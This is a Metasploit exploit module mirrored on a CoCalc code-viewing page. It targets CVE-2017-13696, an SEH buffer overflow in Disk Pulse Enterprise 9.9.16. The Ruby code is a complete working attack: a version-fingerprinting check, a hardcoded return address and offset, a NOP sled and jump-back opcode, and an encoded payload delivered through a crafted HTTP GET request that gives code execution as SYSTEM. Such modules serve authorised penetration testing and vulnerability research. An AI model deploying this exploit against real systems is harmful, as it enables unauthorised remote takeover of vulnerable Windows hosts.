Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
24971 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Disk Pulse Enterprise GET Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits an SEH buffer overflow in Disk Pulse Enterprise

19
          9.9.16. If a malicious user sends a crafted HTTP GET request

20
          it is possible to execute a payload that would run under the Windows

21
          NT AUTHORITY\SYSTEM account.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'Chance Johnson', # msf module - [email protected]

26
          'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com

27
        ],

28
        'References' => [

29
          [ 'CVE', '2017-13696' ],

30
          [ 'EDB', '42560' ]

31
        ],

32
        'DefaultOptions' => {

33
          'EXITFUNC' => 'thread'

34
        },

35
        'Platform' => 'win',

36
        'Payload' => {

37
          'EncoderType' => "alpha_mixed",

38
          'BadChars' => "\x00\x0a\x0d\x26"

39
        },

40
        'Targets' => [

41
          [

42
            'Disk Pulse Enterprise 9.9.16',

43
            {

44
              'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll

45
              'Offset' => 2492

46
            }

47
          ]

48
        ],

49
        'Privileged' => true,

50
        'DisclosureDate' => '2017-08-25',

51
        'DefaultTarget' => 0,

52
        'Notes' => {

53
          'Reliability' => UNKNOWN_RELIABILITY,

54
          'Stability' => UNKNOWN_STABILITY,

55
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

56
        }

57
      )

58
    )

59


60
    register_options([Opt::RPORT(80)])

61
  end

62


63
  def check

64
    res = send_request_cgi(

65
      'uri' => '/',

66
      'method' => 'GET'

67
    )

68


69
    if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/

70
      return Exploit::CheckCode::Appears

71
    end

72


73
    return Exploit::CheckCode::Safe

74
  end

75


76
  def exploit

77
    connect

78


79
    print_status("Generating exploit...")

80
    exp = payload.encoded

81
    exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset

82
    exp << generate_seh_record(target.ret)

83
    exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode

84
    exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start

85
    exp << 'B' * (5000 - exp.length) # padding

86


87
    print_status("Sending exploit...")

88


89
    send_request_cgi(

90
      'uri' => '/../' + exp,

91
      'method' => 'GET',

92
      'host' => '4.2.2.2',

93
      'connection' => 'keep-alive'

94
    )

95


96
    handler

97
    disconnect

98
  end

99
end

100


101